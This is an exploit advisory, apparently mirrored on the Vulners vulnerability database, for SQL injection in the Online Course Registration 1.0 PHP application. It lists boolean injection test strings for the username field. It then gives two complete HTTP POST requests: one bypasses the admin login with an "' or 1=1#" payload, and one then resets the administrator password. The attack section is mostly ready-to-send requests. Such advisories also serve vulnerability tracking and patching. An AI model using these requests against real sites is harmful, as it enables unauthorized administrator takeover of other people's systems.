Vulners
Lucene search
2023 Online Course Registration 1.0 SQL Injection
`## Title: 2023-Online-Course-Registration-1.0-Bypass-login-SQLi-RCE-password-changing
## Author: nu11secur1ty
## Date: 05.25.2023
## Vendor: https://github.com/nikhilkeshava
## Software: https://github.com/nikhilkeshava/online-course-registration-
## Reference: https://portswigger.net/web-security/sql-injection,
https://portswigger.net/web-security/sql-injection/lab-login-bypass
## Description:
The `username` parameter appears to be vulnerable to SQL injection
attacks. The payloads 77834251' or 6127=6127-- and 98762777' or
4535=4542-- were each submitted in the username parameter. These two
requests resulted in different responses, indicating that the input is
unsafely incorporated into a SQL query. The attacker can use this
bypass login vulnerability to send a remote POST request to set a new
administrator password for himself, which is absolutely nasty.
STATUS: HIGH Vulnerability
[+]Payload:
```POST
POST /online-course-registration/admin/index.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=38468sipptm9j24j9e8svavpgn
Content-Length: 62
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/online-course-registration/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=
```
[+]Exploit:
```POST
POST /online-course-registration/admin/change-password.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=38468sipptm9j24j9e8svavpgn
Content-Length: 58
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/online-course-registration/admin/change-password.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
cpass=password&newpass=password5&cnfpass=password5&submit=
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/nikhilkeshava/2023-Online-Course-Registration-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/2023-online-course-registration-10.html)
## Time spend:
01:15:00
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 May 2023 00:00Current
7.1High risk
Vulners AI Score7.1